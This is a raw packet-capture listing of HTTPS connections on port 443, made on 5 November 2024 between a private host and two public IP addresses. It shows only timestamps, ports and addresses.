Nov 5, 2024 18:45:13.121247053 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:13.121247053 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:13.121265888 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:13.121278048 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:13.121316910 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:13.121880054 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:13.121959925 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:13.121967077 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:13.122292042 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:13.122370005 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:13.957798958 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:13.957798958 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:13.957820892 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:13.957832098 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:50.256735086 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:50.256779909 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:50.256850958 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:50.257205009 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:50.257215023 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.059493065 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.059593916 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:51.064219952 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:51.064232111 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.064456940 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.076263905 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:51.123330116 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.342307091 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.342330933 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.342345953 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.342407942 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:51.342426062 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.342472076 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:51.343475103 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.343518019 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.343539000 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:51.343544960 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.343566895 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:51.343569994 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.343615055 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:51.348109961 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:51.348124981 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:51.348151922 CET	49736	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:51.348157883 CET	443	49736	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:53.770962000 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:53.771011114 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:53.771079063 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:53.771420002 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:53.771430969 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.524607897 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.524708986 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.530294895 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.530311108 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.530544996 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.546741962 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.591322899 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.765630960 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.765662909 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.765681982 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.765753984 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.765769005 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.765813112 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.802994013 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.803042889 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.803107977 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.803113937 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.803147078 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.803153992 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.894566059 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.894635916 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.894670010 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.894681931 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.894702911 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.894722939 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.981566906 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.981617928 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.981638908 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.981648922 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.981671095 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.981684923 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.983655930 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.983701944 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.983711004 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.983728886 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.983755112 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.983761072 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.985395908 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.985455990 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.985455990 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.985479116 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:54.985508919 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:54.985522032 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.001372099 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.001415968 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.001435041 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.001440048 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.001468897 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.001475096 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.037053108 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.037072897 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.037118912 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.037123919 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.037153959 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.037172079 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.038058996 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.038079023 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.038106918 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.038110018 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.038131952 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.038144112 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.038997889 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.039016008 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.039042950 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.039047956 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.039073944 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.039089918 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.041106939 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.041125059 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.041156054 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.041161060 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.041178942 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.041196108 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.041558027 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.041575909 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.041604996 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.041610003 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.041636944 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.041644096 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.077614069 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.077644110 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.077689886 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.077696085 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.077722073 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.077733994 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.116976023 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.117054939 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.117063046 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.117104053 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.117167950 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.117182016 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.117192030 CET	49737	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.117197037 CET	443	49737	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.401748896 CET	49738	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.401778936 CET	443	49738	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.401845932 CET	49738	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.402354002 CET	49739	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.402390957 CET	443	49739	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.402447939 CET	49739	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.403831005 CET	49740	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.403863907 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.403919935 CET	49740	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.404560089 CET	49741	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.404582977 CET	443	49741	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.404639006 CET	49741	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.404722929 CET	49738	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.404737949 CET	443	49738	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.404808044 CET	49741	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.404823065 CET	443	49741	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.404920101 CET	49739	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.404937029 CET	443	49739	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.405498981 CET	49740	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.405512094 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.406440973 CET	49742	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.406449080 CET	443	49742	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:55.406503916 CET	49742	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.406621933 CET	49742	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:55.406631947 CET	443	49742	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.143579960 CET	443	49739	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.144314051 CET	49739	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.144342899 CET	443	49739	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.144810915 CET	49739	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.144815922 CET	443	49739	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.146610022 CET	443	49742	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.146960020 CET	49742	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.146981001 CET	443	49742	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.147530079 CET	49742	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.147533894 CET	443	49742	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.159447908 CET	443	49738	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.159887075 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.159909010 CET	49738	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.159928083 CET	443	49738	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.160315037 CET	49738	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.160320997 CET	443	49738	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.160681009 CET	49740	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.160689116 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.161611080 CET	49740	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.161616087 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.185785055 CET	443	49741	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.186376095 CET	49741	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.186398029 CET	443	49741	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.186729908 CET	49741	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.186734915 CET	443	49741	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.276403904 CET	443	49742	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.276570082 CET	443	49742	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.276715040 CET	49742	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.276735067 CET	49742	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.276746035 CET	443	49742	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.276756048 CET	49742	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.276761055 CET	443	49742	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.279849052 CET	443	49739	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.280481100 CET	49743	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.280504942 CET	443	49743	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.280577898 CET	49743	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.280723095 CET	49743	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.280738115 CET	443	49743	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.281061888 CET	443	49739	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.281126976 CET	49739	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.281172037 CET	49739	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.281172037 CET	49739	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.281189919 CET	443	49739	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.281199932 CET	443	49739	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.291083097 CET	49744	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.291102886 CET	443	49744	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.291178942 CET	49744	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.291327953 CET	49744	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.291337013 CET	443	49744	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.294173002 CET	443	49738	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.294202089 CET	443	49738	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.294262886 CET	443	49738	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.294265032 CET	49738	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.294303894 CET	49738	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.294504881 CET	49738	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.294504881 CET	49738	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.294514894 CET	443	49738	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.294523001 CET	443	49738	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.296716928 CET	49745	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.296730042 CET	443	49745	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.296802998 CET	49745	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.296957016 CET	49745	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.296964884 CET	443	49745	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.325220108 CET	443	49741	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.325241089 CET	443	49741	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.325277090 CET	443	49741	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.325303078 CET	49741	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.325345039 CET	49741	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.325485945 CET	49741	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.325494051 CET	443	49741	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.325503111 CET	49741	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.325505972 CET	443	49741	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.329046965 CET	49746	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.329061031 CET	443	49746	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.329161882 CET	49746	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.329282045 CET	49746	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.329291105 CET	443	49746	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.439809084 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.439827919 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.439884901 CET	49740	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.439897060 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.439934969 CET	49740	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.440135002 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.440171003 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.440212965 CET	49740	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.440222025 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.440232992 CET	49740	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.440236092 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.440270901 CET	49740	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.440274000 CET	443	49740	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.443806887 CET	49747	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.443830967 CET	443	49747	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:56.443895102 CET	49747	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.444027901 CET	49747	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:56.444041014 CET	443	49747	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.038935900 CET	443	49744	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.039140940 CET	443	49745	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.039390087 CET	49744	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.039412975 CET	443	49744	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.039592028 CET	49745	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.039602995 CET	443	49745	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.039941072 CET	49744	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.039947033 CET	443	49744	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.040213108 CET	49745	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.040219069 CET	443	49745	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.046972036 CET	443	49743	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.047275066 CET	49743	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.047293901 CET	443	49743	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.047728062 CET	49743	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.047733068 CET	443	49743	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.077589989 CET	443	49746	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.077838898 CET	49746	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.077850103 CET	443	49746	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.078300953 CET	49746	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.078305006 CET	443	49746	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.173116922 CET	443	49745	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.173182964 CET	443	49745	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.173372984 CET	49745	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.173393011 CET	49745	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.173393011 CET	49745	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.173403025 CET	443	49745	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.173412085 CET	443	49745	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.176208973 CET	49748	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.176225901 CET	443	49748	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.176292896 CET	49748	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.176407099 CET	49748	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.176419020 CET	443	49748	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.187536001 CET	443	49743	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.187746048 CET	443	49743	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.187794924 CET	49743	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.187962055 CET	49743	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.187962055 CET	49743	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.187973022 CET	443	49743	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.187980890 CET	443	49743	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.190119028 CET	49749	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.190145969 CET	443	49749	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.190213919 CET	49749	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.190349102 CET	49749	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.190362930 CET	443	49749	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.197623968 CET	443	49747	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.197951078 CET	49747	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.197964907 CET	443	49747	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.198460102 CET	49747	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.198465109 CET	443	49747	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.209872961 CET	443	49746	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.210114956 CET	443	49746	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.210169077 CET	49746	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.210334063 CET	49746	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.210334063 CET	49746	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.210347891 CET	443	49746	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.210356951 CET	443	49746	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.212363958 CET	49750	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.212380886 CET	443	49750	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.212450027 CET	49750	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.212580919 CET	49750	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.212594032 CET	443	49750	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.251128912 CET	443	49744	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.251501083 CET	443	49744	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.251678944 CET	49744	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.251678944 CET	49744	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.251678944 CET	49744	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.253622055 CET	49751	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.253639936 CET	443	49751	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.253705978 CET	49751	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.253812075 CET	49751	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.253824949 CET	443	49751	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.328425884 CET	443	49747	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.329221010 CET	443	49747	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.329303980 CET	49747	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.329469919 CET	49747	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.329469919 CET	49747	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.329479933 CET	443	49747	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.329488039 CET	443	49747	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.331840992 CET	49752	443	192.168.2.4	13.107.246.45
